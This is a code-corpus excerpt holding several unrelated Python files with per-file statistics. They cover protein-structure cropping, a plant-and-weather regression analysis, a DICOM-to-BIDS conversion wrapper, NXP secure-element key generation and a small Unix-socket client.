logger.info('Done\n')
if insprot is not None and minlen>0.0:
logger.info('Parsing uniprot sequence file '+insprot)
uniprotset={}
for seqncid, seqnc in seqset.items():
for monomerid, monomer in seqnc.imer.items():
if 'uniprot' in intervals[seqncid][monomerid].tags:
for key in intervals[seqncid][monomerid].tags['uniprot']:
if key.upper() not in uniprotset:
uniprotset[key.upper()]=None
uniprotset=cin.parseseqfile(insprot, uniprot=uniprotset)['uniprot']
logger.info('Done\n')
###########################################
gseqset={}
logger.info('Renumbering structure(s)...')
for key, structure in strset.items():
if key in seqset:
newstructure,gseqset[key]=cop.renumber_pdb(seqset[key],structure,seqback=True)
outstr=outpathgen(outdir,subdir=key,filename=key+infixlbl["renumber"]+os.path.splitext(instr)[1],mksubdir=True)
#newstructure.write_pdb(outstr)
newstructure.write_minimal_pdb(outstr)
logger.info('Done\n')
logger.info('Cropping renumbered structure(s)...')
outseq=os.path.join(outdir,os.path.splitext(os.path.basename(inseq))[0]+infixlbl["croprenum"]+os.path.splitext(os.path.basename(inseq))[1])
for key, S in gseqset.items():
newS=S.deepcopy()
if key in intervals:
if insprot is not None and minlen>0.0:
newinterval={}
for key2,monomer in S.imer.items():
if key2 in intervals[key]:
if insprot is not None and minlen>0.0:
newinterval[key2]=intervals[key][key2].deepcopy()
newinterval[key2].tags['description']+=' - Uniprot threshold'
newinterval[key2].subint=[]
unilbl=' uniprot chains included: '
for unicode,uniintervals in intervals[key][key2].tags['uniprot'].items():
if 100*uniintervals.n_elements()/uniprotset.imer[unicode].length()>=minlen:
newinterval[key2]=newinterval[key2].union(intervals[key][key2].intersection(uniintervals))
unilbl+=unicode +'|'
monomer=cop.crop_seq(monomer,newinterval[key2],targetlbl+unilbl,terms=args.terminals)
else:
monomer=cop.crop_seq(monomer,intervals[key][key2],targetlbl,terms=args.terminals)
newS.imer[key2]=monomer.deepcopy()
else:
logger.warning('Chain-name '+key+'_'+str(key2)+' not found in database. Cropping not performed.')
outseq=outpathgen(outdir,subdir=key,filename=key+infixlbl["croprenum"]+os.path.splitext(os.path.basename(inseq))[1])
monomer.dump(outseq)
if 'cropmap' in monomer.info:
outmap=outpathgen(outdir,subdir=key,filename=key+infixlbl["croprenum"]+'.cropmap')
monomer.dumpmap(outmap)
cropped_str=cop.crop_pdb(strset[key],newS,original_id=True)
outstr=outpathgen(outdir,subdir=key,filename=key+infixlbl["crop"]+os.path.splitext(instr)[1],mksubdir=True)
#cropped_str.write_pdb(outstr)
cropped_str.write_minimal_pdb(outstr)
cropped_str2=cop.crop_pdb(strset[key],newS,original_id=False)
outstr=outpathgen(outdir,subdir=key,filename=key+infixlbl["croprenum"]+os.path.splitext(instr)[1],mksubdir=True)
#cropped_str2.write_pdb(outstr)
cropped_str2.write_minimal_pdb(outstr)
else:
logger.warning('PDB-ID '+key.upper()+' not found in database. Cropping not performed.')
for key2,monomer in newS.imer.items():
outseq=outpathgen(outdir,subdir=key,filename=key+os.path.splitext(os.path.basename(inseq))[1])
monomer.dump(outseq)
logger.info('Done\n')
return
if __name__ == "__main__":
import sys
import traceback
try:
main()
logger.info(ccl.ok())
sys.exit(0)
except Exception as e:
if not isinstance(e, SystemExit):
msg = "".join(traceback.format_exception(*sys.exc_info()))
logger.critical(msg)
sys.exit(1)
| 47.862069
| 289
| 0.635687
| 1,006
| 8,328
| 5.127237
| 0.241551
| 0.027142
| 0.012214
| 0.029081
| 0.257076
| 0.227608
| 0.215587
| 0.178945
| 0.142691
| 0.116906
| 0
| 0.009274
| 0.236071
| 8,328
| 173
| 290
| 48.138728
| 0.801478
| 0.035303
| 0
| 0.179856
| 0
| 0.014388
| 0.17257
| 0.007815
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014388
| false
| 0
| 0.093525
| 0
| 0.122302
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
90251fea4bf1c0681bcedcffe3e8a599e9d53e72
| 13,189
|
py
|
Python
|
DSDM_Assignment2_final.py
|
antonyjames1996/time-series-analysis-agrotech
|
1e2abfe07f0e82c7a6f5cc01a268826fb2d29635
|
[
"MIT"
] | null | null | null |
DSDM_Assignment2_final.py
|
antonyjames1996/time-series-analysis-agrotech
|
1e2abfe07f0e82c7a6f5cc01a268826fb2d29635
|
[
"MIT"
] | null | null | null |
DSDM_Assignment2_final.py
|
antonyjames1996/time-series-analysis-agrotech
|
1e2abfe07f0e82c7a6f5cc01a268826fb2d29635
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[95]:
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
# get_ipython().run_line_magic('matplotlib', 'inline')
from sklearn.neighbors import LocalOutlierFactor
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.ensemble import RandomForestRegressor
from sklearn.multioutput import MultiOutputRegressor
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.ensemble import StackingRegressor
from sklearn.svm import LinearSVR
from sklearn.metrics import r2_score
from sklearn.ensemble import StackingRegressor
from sklearn.feature_selection import RFECV
# from xgboost.sklearn import XGBClassifier
data = pd.ExcelFile('Data.xlsx')
plants = pd.read_excel(data, 'plants')
flight = pd.read_excel(data, 'flight dates')
planting = pd.read_excel(data, 'planting')
weather = pd.read_excel(data, 'weather')
# In[2]:
# Renaming the plants data columns
plants = plants.rename(columns = {'Batch Number': 'batch_number', 'Plant Date': 'plant_date', 'Class': 'class',
'Fresh Weight (g)': 'fresh_weight', 'Head Weight (g)': 'head_weight',
'Radial Diameter (mm)': 'radial_diameter', 'Polar Diameter (mm)': 'polar_diameter',
'Diameter Ratio': 'diameter_ratio', 'Leaves': 'leaves', 'Density (kg/L)': 'density',
'Leaf Area (cm^2)': 'leaf_area', 'Square ID': 'square_id',
'Check Date': 'check_date', 'Flight Date': 'flight_date', 'Remove': 'remove'})
plants.describe()
# In[3]:
# Dropping the garbage rows at the end of the planting sheet (keep rows 0-1820)
planting = planting.iloc[0:1821, :]
planting = planting.drop(columns = ['Column2', 'Column3', 'Column1', 'Column4'])
planting
# In[4]:
# Keep only the rows where the 'remove' column is null
plants = plants[plants['remove'].isnull()]
# Dropping the remove column from the dataset
plants = plants.drop(columns = ['remove'])
# Dropping the leaves column
plants = plants.drop(columns = ['leaves'])
# In[5]:
# the number of NaN values in the plants plant_date
plants['plant_date'].isna().sum()
# In[6]:
# rename the flights data columns
flight = flight.rename(columns = {'Batch Number': 'batch_number', 'Flight Date': 'flight_date'})
# In[7]:
# Merging the plants and flight data on 'batch_number'
df_merge = pd.merge(plants, flight, how = 'left', on = 'batch_number')
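# Coalesce the duplicated flight date columns produced by the merge: keep the
# value from the plants table (flight_date_x) where present and fall back to
# the value from the flights table (flight_date_y)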
dd1 = df_merge.loc[: , df_merge.columns != 'flight_date_x']
dd2 = df_merge.drop('flight_date_y', axis = 1)
dd1 = dd1.rename(columns = {'flight_date_y': 'flight_date'})
dd2 = dd2.rename(columns = {'flight_date_x': 'flight_date'})
dd1.update(dd2)
df_merge = dd1
# In[8]:
### Dropping the NaN values of the flight_date, head_weight, radial_diameter, polar_diameter
plant = df_merge.dropna(subset = ['flight_date', 'head_weight', 'radial_diameter', 'polar_diameter'])
# In[9]:
plant = plant.copy()
# In[10]:
plant
# In[11]:
### dropping the rows with Null values in plant_date
plant.dropna(subset = ['plant_date'], inplace = True)
# In[12]:
### Create a new variable 'flight_time': the number of days from 'plant_date' to 'flight_date'
plant['flight_time'] = plant['flight_date'] - plant['plant_date']
plant['flight_time'] = plant['flight_time'].astype('timedelta64[D]')
# In[13]:
plant['check_time'] = plant['check_date'] - plant['plant_date']
plant['check_time'] = plant['check_time'].astype('timedelta64[D]')
# In[14]:
plant['check_flight_time'] = plant['check_date'] - plant['flight_date']
plant['check_flight_time'] = plant['check_flight_time'].astype('timedelta64[D]')
# In[15]:
### dropping all the Null values in the plants
plant.dropna(inplace=True)
# In[16]:
### changing the plant-date and check-date to date time format
plant['plant_date']= pd.to_datetime(plant['plant_date'])
plant['check_date']= pd.to_datetime(plant['check_date'])
# In[17]:
### renaming the columns of the weather data
weather = weather.rename(columns = {'Unnamed: 0': 'weather_date', 'Solar Radiation [avg]': 'solar_radiation',
'Precipitation [sum]': 'precipitation', 'Wind Speed [avg]': 'wind_speed_avg',
'Wind Speed [max]': 'wind_speed_max', 'Battery Voltage [last]': 'battery_voltage',
'Leaf Wetness [time]': 'leaf_wetness', 'Air Temperature [avg]': 'air_temp_avg',
'Air Temperature [max]': 'air_temp_max', 'Air Temperature [min]': 'air_temp_min',
'Relative Humidity [avg]': 'relative_humidity', 'Dew Point [avg]': 'dew_point_avg',
'Dew Point [min]': 'dew_point_min', 'ET0 [result]': 'eto_result'})
# In[18]:
### dropping the duplicates in the weather dataset
weather = weather.drop_duplicates(subset = ['weather_date'])
# In[19]:
### changing the weather-date to date time format
weather['weather_date']= pd.to_datetime(weather['weather_date'])
# In[20]:
# iterate with the DataFrame's own index so .at[] writes to the matching rows
for x, (i, j) in zip(plant.index, zip(plant.plant_date, plant.check_date)):
df_subset = weather[(weather['weather_date']>i) & (weather['weather_date']< j)]
plant.at[x, 'avg_precipitation'] = (df_subset['precipitation'].mean())
plant.at[x, 'std_precipitation'] = (df_subset['precipitation'].std())
plant.at[x, 'avg_solar_rad'] = df_subset['solar_radiation'].mean()
plant.at[x, 'std_solar_rad'] = df_subset['solar_radiation'].std()
plant.at[x, 'avg_wind_speed'] = df_subset['wind_speed_avg'].mean()
plant.at[x, 'std_wind_speed'] = df_subset['wind_speed_avg'].std()
plant.at[x, 'avg_air_temp'] = df_subset['air_temp_avg'].mean()
plant.at[x, 'std_air_temp'] = df_subset['air_temp_avg'].std()
plant.at[x, 'avg_leaf_wetness'] = df_subset['leaf_wetness'].mean()
plant.at[x, 'std_leaf_wetness'] = df_subset['leaf_wetness'].std()
plant.at[x, 'avg_relative_humidity'] = df_subset['relative_humidity'].mean()
plant.at[x, 'std_relative_humidity'] = df_subset['relative_humidity'].std()
plant.at[x, 'avg_dew_point'] = df_subset['dew_point_avg'].mean()
plant.at[x, 'std_dew_point'] = df_subset['dew_point_avg'].std()
# In[21]:
### dropping the rows with Null values again if any
plant = plant.dropna()
# In[22]:
plant = plant[['plant_date', 'flight_date', 'check_date','batch_number', 'class', 'density',
'leaf_area','square_id',
'flight_time', 'check_time', 'check_flight_time',
'avg_precipitation', 'std_precipitation', 'avg_solar_rad', 'std_solar_rad',
'avg_wind_speed','std_wind_speed', 'avg_air_temp', 'std_air_temp',
'avg_leaf_wetness', 'std_leaf_wetness', 'avg_relative_humidity','std_relative_humidity',
'avg_dew_point','std_dew_point' ,'fresh_weight', 'diameter_ratio',
'head_weight', 'radial_diameter', 'polar_diameter']]
# In[23]:
plant
# In[97]:
### Exploratory Data Analysis
### Plant data analysis
plant_data = plant[['batch_number', 'class',
'density', 'leaf_area','square_id', 'flight_time', 'check_time' ,'fresh_weight',
'diameter_ratio', 'head_weight', 'radial_diameter', 'polar_diameter']]
plant_data.hist(figsize = (16,10))
# plt.savefig("plant_hist.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[98]:
### plant_data heatmap
fig = plt.figure(figsize = (10,10))
sns.heatmap(plant_data.corr(), vmax = 0.6, square = True)
# plt.savefig("plant_heatmap.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[106]:
sns.jointplot(x = "radial_diameter",y = "polar_diameter", data=plant, hue="class");
# plt.savefig("radial_polar.pdf", format="pdf", bbox_inches="tight")
# plt.suptitle("Joint plot between Fresh Weight and Head Weight", y = 0)
# plt.show()
# In[107]:
sns.jointplot(x = "fresh_weight", y = "head_weight", data=plant
, hue="class");
plt.suptitle("Joint plot between Fresh Weight and Head Weight", y = 0)
# plt.savefig("fresh_weight_head_weight.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[108]:
sns.scatterplot(data = plant, x="check_time", y="density", hue="class")
plt.title('Scatterplot between check_time - density',loc='center' ,y=-0.3)
plt.xlabel('check_time')
plt.ylabel('density')
# plt.savefig("check_time_density.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[109]:
sns.pairplot(plant[['batch_number', 'class', 'flight_time' ,
'head_weight', 'radial_diameter', 'polar_diameter']])
# plt.savefig("plant_pairplot.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[110]:
### weather data analysis
weather.hist(figsize = (16,10))
# plt.savefig("weather_histplot.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[111]:
fig = plt.figure(figsize = (10,10))
sns.heatmap(weather.corr(), vmax = .8, square = True)
# plt.savefig("weather_heatmap.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[37]:
X = plant.iloc[:, 3:-5]
y = plant.iloc[:, -3:]
# In[43]:
X = X.to_numpy()
y = y.to_numpy()
# In[45]:
### detection of Outliers
outliers = LocalOutlierFactor()
out = outliers.fit_predict(X)
# masking out by selecting all rows that are not outliers
mask = out != -1
X, y = X[mask, :], y[mask]
print(X.shape, y.shape)
# In[47]:
# Split the data into train, test split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)
# In[127]:
X_plant = plant.iloc[:, 3:11]
y_plant = plant.iloc[:, -3:]
X_weather = plant.iloc[:, 11:25]
y_weather = plant.iloc[:, -3:]
# In[128]:
X_plant_train, X_plant_test, y_plant_train, y_plant_test = train_test_split(X_plant, y_plant, test_size=0.33,
random_state=42)
X_weather_train, X_weather_test, y_weather_train, y_weather_test = train_test_split(X_weather, y_weather,
test_size=0.33, random_state=42)
# In[132]:
# Model 1 : Linear Regression
model = LinearRegression()
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
print('Linear Regression model score:' ,r2_score(y_test, y_pred, multioutput='variance_weighted'))
# In[129]:
# Model 1.1 : Linear Regression using just plants data
model = LinearRegression()
model.fit(X_plant_train, y_plant_train)
y_pred = model.predict(X_plant_test)
print('Linear Regression model score with plants:' ,r2_score(y_plant_test, y_pred, multioutput='variance_weighted'))
# In[130]:
# Model 1.2 : Linear Regression using just weather data
model = LinearRegression()
model.fit(X_weather_train, y_weather_train)
y_pred = model.predict(X_weather_test)
print('Linear Regression model score with weather:' ,r2_score(y_weather_test, y_pred, multioutput='variance_weighted'))
# In[135]:
# Model 2 : Random Forest
model = RandomForestRegressor()
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
print('Random Forest model score:' ,r2_score(y_test, y_pred, multioutput='variance_weighted'))
# In[137]:
feat_importances = pd.Series(model.feature_importances_, index=plant.iloc[:, 3:-5].columns)
feat_importances.nlargest(10).plot(kind='barh')
# plt.savefig("feature_imp_all.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[138]:
# Model 2.1 : Random Forest using just plant data
model = RandomForestRegressor()
model.fit(X_plant_train, y_plant_train)
y_pred = model.predict(X_plant_test)
print('Random Forest model score with plants:' ,r2_score(y_plant_test, y_pred, multioutput='variance_weighted'))
# In[140]:
feat_importances = pd.Series(model.feature_importances_, index=plant.iloc[:, 3:11].columns)
feat_importances.nlargest(10).plot(kind='barh')
# plt.savefig("feature_imp_plant.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[141]:
# Model 2.2 : Random Forest using just weather data
model = RandomForestRegressor()
model.fit(X_weather_train, y_weather_train)
y_pred = model.predict(X_weather_test)
print('Random Forest model score with weather:' ,r2_score(y_weather_test, y_pred, multioutput='variance_weighted'))
# In[142]:
feat_importances = pd.Series(model.feature_importances_, index=plant.iloc[:, 11:25].columns)
feat_importances.nlargest(10).plot(kind='barh')
# plt.savefig("feature_imp_weather.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[94]:
# list(plant.iloc[:, 3:-5].columns.values)
# In[ ]:
# In[93]:
# # Model 2 : Random Forest
# model = RandomForestRegressor()
# model.fit(X_train, y_train)
# y_pred = model.predict(X_test)
# print('model score:' ,r2_score(y_test, y_pred, multioutput='variance_weighted'))
# In[ ]:
# 'batch_number' ,'density' , 'leaf_area' , 'check_time', 'std_precipitation', 'avg_solar_rad',
# 'std_solar_rad', 'std_air_temp', 'avg_relative_humidity', 'std_relative_humidity', 'avg_dew_point',
# 'std_dew_point'
# In[91]:
# Model 3 : Gradient Boosting
reg = MultiOutputRegressor(GradientBoostingRegressor())
reg.fit(X_train, y_train)
print('Gradient Boosting score', reg.score(X_test, y_test))
# In[ ]:
| 26.116832
| 119
| 0.679506
| 1,840
| 13,189
| 4.645652
| 0.167391
| 0.012635
| 0.013102
| 0.02059
| 0.502223
| 0.433786
| 0.340664
| 0.286968
| 0.253276
| 0.219584
| 0
| 0.02066
| 0.163242
| 13,189
| 504
| 120
| 26.168651
| 0.753896
| 0.251801
| 0
| 0.16875
| 0
| 0
| 0.300638
| 0.008646
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.13125
| 0
| 0.13125
| 0.05
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9025967f892fe7e0100f3ff33e467fab11a11531
| 4,830
|
py
|
Python
|
dcm2niix.py
|
rhancockn/dcm2bids
|
16597eeb20edfa0ec707c9bd0bf8468d94e0c925
|
[
"MIT"
] | null | null | null |
dcm2niix.py
|
rhancockn/dcm2bids
|
16597eeb20edfa0ec707c9bd0bf8468d94e0c925
|
[
"MIT"
] | null | null | null |
dcm2niix.py
|
rhancockn/dcm2bids
|
16597eeb20edfa0ec707c9bd0bf8468d94e0c925
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import tempfile
import os
import dicom
import pandas
import json
import numpy as np
from os.path import join
import glob
import errno
import shutil
class dcm2niix(object):
"""A wrapper for the dcm2niix command
"""
def __init__(self, row, bids_dir, intent = None):
self.intent = intent
#Dicom keys of interest
self.keys=['RepetitionTime', 'AcquisitionMatrix', 'EchoTime', 'EchoTrainLength','FlipAngle', 'Manufacturer', 'ManufacturerModelName', 'MagneticFieldStrength', 'DeviceSerialNumber', 'SoftwareVersions', 'InversionTime', 'PixelBandwidth', 'ScanOptions', 'InPlanePhaseEncodingDirection']
self.wd = os.getcwd()
self.row = row
self.bids_basename = join(bids_dir, 'sub-' + row.PatientID, row.target_path)
files = glob.glob(join(row.DICOMPath, 'IM-*-0001.dcm'))
self.dcm = dicom.read_file(files[0])
#def __del__(self):
# os.rmdir(self.tempdir)
def _make_dicom_json(self):
self.json_dict = {}
keys = np.intersect1d(self.keys,self.dcm.dir())
for k in keys:
self.json_dict[k] = self.dcm.get(k)
if self.dcm.has_key((0x19,0x1028)):
self.json_dict['EffectiveEchoSpacing'] = 1.0/(self.dcm[0x19,0x1028].value*self.dcm.AcquisitionMatrix[0])
self.json_dict['TotalReadoutTime'] = 1.0/self.dcm[0x19,0x1028].value
if self.dcm.has_key((0x19,0x1029)):
self.json_dict['SliceTiming'] = self.dcm[0x19,0x1029].value
self.json_dict['PulseSequenceDetails'] = self.dcm[0x18,0x24].value
if self.dcm.has_key((0x20,0x4000)):
self.json_dict['PulseSequenceDetails'] = self.json_dict['PulseSequenceDetails'] + ' ' + self.dcm[0x20,0x4000].value
if self.dcm.has_key((0x51,0x100f)):
self.json_dict['ReceiveCoilName'] = self.dcm[0x51,0x100f].value
self.json_dict['TaskName'] = self.row.task
self.json_dict['PhaseEncodingDirectionPositive'] = self.row.PhaseEncodingDirectionPositive
#add the list of intent scans, if any.
if self.intent:
self.json_dict['IntendedFor'] = self.intent
def _convert(self):
self.tempdir = tempfile.mkdtemp()
cmd = 'dcm2niix -b y -o . -z y -x n -f out "%s"' % self.row.DICOMPath
os.chdir(self.tempdir)
err = os.system(cmd)
if err != 0:
raise Exception('Error converting DICOM %s' % self.row.DICOMPath)
os.chdir(self.wd)
def _copy(self):
bids_dir = os.path.dirname(self.bids_basename)
self._mkdir_p(bids_dir)
#the magnitudes from both echoes are in the same directory
#dcm2niix splits the echoes. Copy them appropriately
if self.row.type == 'magnitude':
if os.path.isfile(join(self.tempdir,'out.nii.gz')):
shutil.copyfile(join(self.tempdir,'out.nii.gz'), self.bids_basename + '1.nii.gz')
if os.path.isfile(join(self.tempdir,'_e2out.nii.gz')):
shutil.copyfile(join(self.tempdir,'_e2out.nii.gz'), self.bids_basename + '2.nii.gz')
if os.path.isfile(join(self.tempdir,'out.bids')):
json_fname = self.bids_basename + '1.json'
shutil.copyfile(join(self.tempdir,'out.bids'), json_fname)
self._update_json(json_fname)
json_fname = self.bids_basename + '2.json'
shutil.copyfile(join(self.tempdir,'_e2out.bids'), json_fname)
self._update_json(json_fname)
elif self.row.type in ['phasediff', 'magnitude2']:
shutil.copyfile(glob.glob(join(self.tempdir,'*out.nii.gz'))[0], self.bids_basename + '.nii.gz')
json_fname = self.bids_basename + '.json'
shutil.copyfile(glob.glob(join(self.tempdir,'*out.bids'))[0], json_fname)
self._update_json(json_fname)
#anything but a single magnitude directory should produce one out.nii.gz/out.bids pair
else:
imgs = glob.glob(join(self.tempdir, '*out*.nii.gz'))
if len(imgs) > 1:
raise Exception('More out.nii.gz files than expected')
shutil.copyfile(join(self.tempdir,'out.nii.gz'), self.bids_basename + '.nii.gz')
json_fname = self.bids_basename + '.json'
shutil.copyfile(join(self.tempdir,'out.bids'), json_fname)
self._update_json(json_fname)
if self.row.type == 'dwi':
shutil.copyfile(join(self.tempdir,'out.bval'), self.bids_basename + '.bval')
shutil.copyfile(join(self.tempdir,'out.bvec'), self.bids_basename + '.bvec')
def _update_json(self, fname):
fp=open(fname, 'r+')
meta = json.load(fp)
orig_keys = np.intersect1d(self.json_dict.keys(), meta.keys())
for k in np.setdiff1d(self.json_dict.keys(),meta.keys()):
meta[k]=self.json_dict[k]
for k in orig_keys:
meta['o'+k] = self.json_dict[k]
fp.seek(0)
json.dump(meta,fp,indent=2)
fp.close()
def _mkdir_p(self,path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def process(self):
self._make_dicom_json()
self._convert()
self._copy()
os.system('chmod 2550 %s*' % self.bids_basename)
shutil.rmtree(self.tempdir)
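# Illustrative usage (hypothetical values; `row` is expected to expose the
# attributes referenced above: PatientID, DICOMPath, target_path, type, task,
# PhaseEncodingDirectionPositive):
#   converter = dcm2niix(row, '/data/bids')
#   converter.process()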
| 32.2
| 285
| 0.695238
| 702
| 4,830
| 4.65812
| 0.264957
| 0.06055
| 0.058716
| 0.06055
| 0.37156
| 0.33578
| 0.237615
| 0.184098
| 0.125994
| 0.105199
| 0
| 0.027014
| 0.149275
| 4,830
| 149
| 286
| 32.416107
| 0.7688
| 0.073292
| 0
| 0.098039
| 0
| 0
| 0.169279
| 0.022615
| 0
| 0
| 0.021944
| 0
| 0
| 1
| 0.068627
| false
| 0.009804
| 0.098039
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
902da8cbd33808618399125bb013b3cfef957b80
| 4,479
|
py
|
Python
|
src/sss/genkey.py
|
foundriesio/plug-and-trust-ssscli
|
f77c65d5b3de649d7db1c023ee41d871f77cd224
|
[
"Apache-2.0"
] | null | null | null |
src/sss/genkey.py
|
foundriesio/plug-and-trust-ssscli
|
f77c65d5b3de649d7db1c023ee41d871f77cd224
|
[
"Apache-2.0"
] | null | null | null |
src/sss/genkey.py
|
foundriesio/plug-and-trust-ssscli
|
f77c65d5b3de649d7db1c023ee41d871f77cd224
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2018-2020 NXP
# SPDX-License-Identifier: Apache-2.0
#
#
"""License text"""
import logging
from . import sss_api as apis
from .keystore import KeyStore
from .keyobject import KeyObject
from .getkey import Get
from .util import get_ecc_cypher_type
log = logging.getLogger(__name__)
class Generate:
"""
Generate key pair/public key of ecc/rsa
"""
def __init__(self, session_obj):
"""
Constructor
:param session_obj: Instance of session
"""
self._session = session_obj
self._ctx_ks = KeyStore(self._session)
self._ctx_key = KeyObject(self._ctx_ks)
self.key_obj_mode = apis.kKeyObject_Mode_Persistent
def gen_ecc_public(self, key_id, curve_type, file_name, policy, encode_format=""): # pylint: disable=too-many-arguments
"""
Generate ecc public key
:param key_id: Key index
:param curve_type: ECC curve type
:param file_name: File name to store public key
:param policy: Policy to be applied
:param encode_format: File format to store public key
:return: Status
"""
if file_name[-4:] != '.pem' and file_name[-4:] != '.der':
log.error("Unsupported file type. File type should be in pem or der format")
return apis.kStatus_SSS_Fail
status = self.gen_ecc_pair(key_id, curve_type, policy)
if status != apis.kStatus_SSS_Success:
return status
get = Get(self._session)
status = get.get_key(key_id, file_name, encode_format)
return status
def gen_ecc_pair(self, key_id, curve_type, policy):
"""
Generate ecc key pair
:param key_id: Key index
:param curve_type: ECC curve type
:param policy: Policy to be applied
:return: Status
"""
cypher_type, key_size = get_ecc_cypher_type(curve_type)
key_type = apis.kSSS_KeyPart_Pair
if key_size == 0:
log.error("curve type not supported")
return apis.kStatus_SSS_Fail
status = self._gen_key_pair(key_id, key_size, key_type, cypher_type, policy)
return status
def gen_rsa_public(self, key_id, key_size, file_name, policy):
"""
Generate rsa public key
:param key_id: Key index
:param key_size: Key size to generate
:param file_name: File name to store public key
:param policy: Policy to be applied
:return: Status
"""
if file_name[-4:] != '.pem' and file_name[-4:] != '.der':
log.error("Unsupported file type. File type should be in pem or der format")
return apis.kStatus_SSS_Fail
status = self.gen_rsa_pair(key_id, key_size, policy)
if status != apis.kStatus_SSS_Success:
return status
get = Get(self._session)
status = get.get_key(key_id, file_name)
return status
def gen_rsa_pair(self, key_id, key_size, policy):
"""
Generate rsa key pair
:param key_id: Key index
:param key_size: RSA key size to generate
:param policy: Policy to be applied
:return: Status
"""
key_type = apis.kSSS_KeyPart_Pair
cypher_type = apis.kSSS_CipherType_RSA_CRT
status = self._gen_key_pair(key_id, key_size, key_type, cypher_type, policy)
return status
def _gen_key_pair(self, key_id, key_size, key_type, cypher_type, policy): # pylint: disable=too-many-arguments
"""
Generate key pair
:param key_id: Key index
:param key_size: Key size
:param key_type: Key type
:param cypher_type: Cypher type
:param policy: Policy to be applied
:return: Status
"""
# Key length calculation based on key bit length
# if modulus of key_bit_len is non zero, then allocate extra byte
if (key_size % 8) != 0:
key_len = (key_size / 8) + 1
else:
key_len = key_size / 8
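# Illustrative example: key_size=256 is byte-aligned, so key_len=32 bytes;
# key_size=521 (e.g. NIST P-521) is not, so key_len=int((521/8)+1)=66 bytes.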
status = self._ctx_key.allocate_handle(key_id, key_type, cypher_type, int(key_len),
self.key_obj_mode)
if status != apis.kStatus_SSS_Success:
return status
status = self._ctx_ks.generate_key(self._ctx_key, key_size, policy)
if status != apis.kStatus_SSS_Success:
return status
status = self._ctx_ks.save_key_store()
return status
| 33.177778
| 124
| 0.621121
| 607
| 4,479
| 4.319605
| 0.177924
| 0.048055
| 0.036613
| 0.02746
| 0.611365
| 0.548055
| 0.490465
| 0.490465
| 0.471777
| 0.410755
| 0
| 0.006353
| 0.297165
| 4,479
| 134
| 125
| 33.425373
| 0.826557
| 0.273052
| 0
| 0.433333
| 0
| 0
| 0.057619
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.416667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
902e9315b6728c26e93d095508b7d9dca413b5b0
| 979
|
py
|
Python
|
Python/uds/uds_client.py
|
kaehsu/template-bash
|
f8a8a4babb8537622a4e4246701761a9832d6aeb
|
[
"MIT"
] | null | null | null |
Python/uds/uds_client.py
|
kaehsu/template-bash
|
f8a8a4babb8537622a4e4246701761a9832d6aeb
|
[
"MIT"
] | null | null | null |
Python/uds/uds_client.py
|
kaehsu/template-bash
|
f8a8a4babb8537622a4e4246701761a9832d6aeb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
#
# To communicate with UDS server by nc: "echo -e "string\c" | sudo nc -q 1 -U /var/run/uds_led"
import socket
serverAddress = '/tmp/portex_tmp'
def main():
try:
while True:
message = input(
'Enter the message to send to the server ("Quit" to quit): ')
if message:
if message == 'Quit':
raise SystemExit
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(serverAddress)
sock.send(message.encode('utf-8'))
#r = sock.recv(1024)
print('Receiving message "{}" from server.\n'.format(
sock.recv(1024).decode()))
sock.close()
else:
print('You have to enter something.....\n')
continue
except KeyboardInterrupt:
print('\n')
# sock.close()
if __name__ == '__main__':
main()
| 28.794118
| 95
| 0.507661
| 107
| 979
| 4.53271
| 0.626168
| 0.037113
| 0.049485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017828
| 0.369765
| 979
| 33
| 96
| 29.666667
| 0.768233
| 0.150153
| 0
| 0
| 0
| 0
| 0.188634
| 0
| 0
| 0
| 0
| 0
